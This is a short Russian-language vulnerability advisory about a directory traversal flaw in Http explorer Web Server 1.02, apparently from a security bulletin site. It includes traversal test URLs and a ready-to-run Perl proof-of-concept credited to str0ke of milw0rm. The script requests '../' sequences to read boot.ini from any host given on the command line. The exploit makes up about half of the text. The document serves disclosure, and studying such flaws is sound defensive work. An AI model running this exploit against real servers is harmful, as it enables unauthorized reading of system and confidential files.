Программа: Http explorer Web Server 1.02

Уязвимость позволяет удаленному злоумышленнику получить несанкционированный доступ к конфиденциальной информации на целевой системе. Уязвимость существует из-за ошибки, в Web сервере, приводящей к возможности использования спцификаторов обхода директорий для получения содержимого произвольных файлов.

Пример:

# Http explorer Web Server 1.02 Directory Transversal Vulnerability
# http://sourceforge.net/projects/http-explorer/
# Test: http://[site]/../../../../ || http://[site]/../
# /str0ke

use LWP::Simple;
use strict;

sub usage
{
print "Http explorer Web Server 1.02 Directory Transversal Vulnerability\n";
print "str0ke (milw0rm.com)\n";
print "Usage: $0 www.example.com\n";
exit ();
}

my $host= shift || &usage;

getprint "http://" . $host . "/../../../../../../../../boot.ini";



Оставить мнение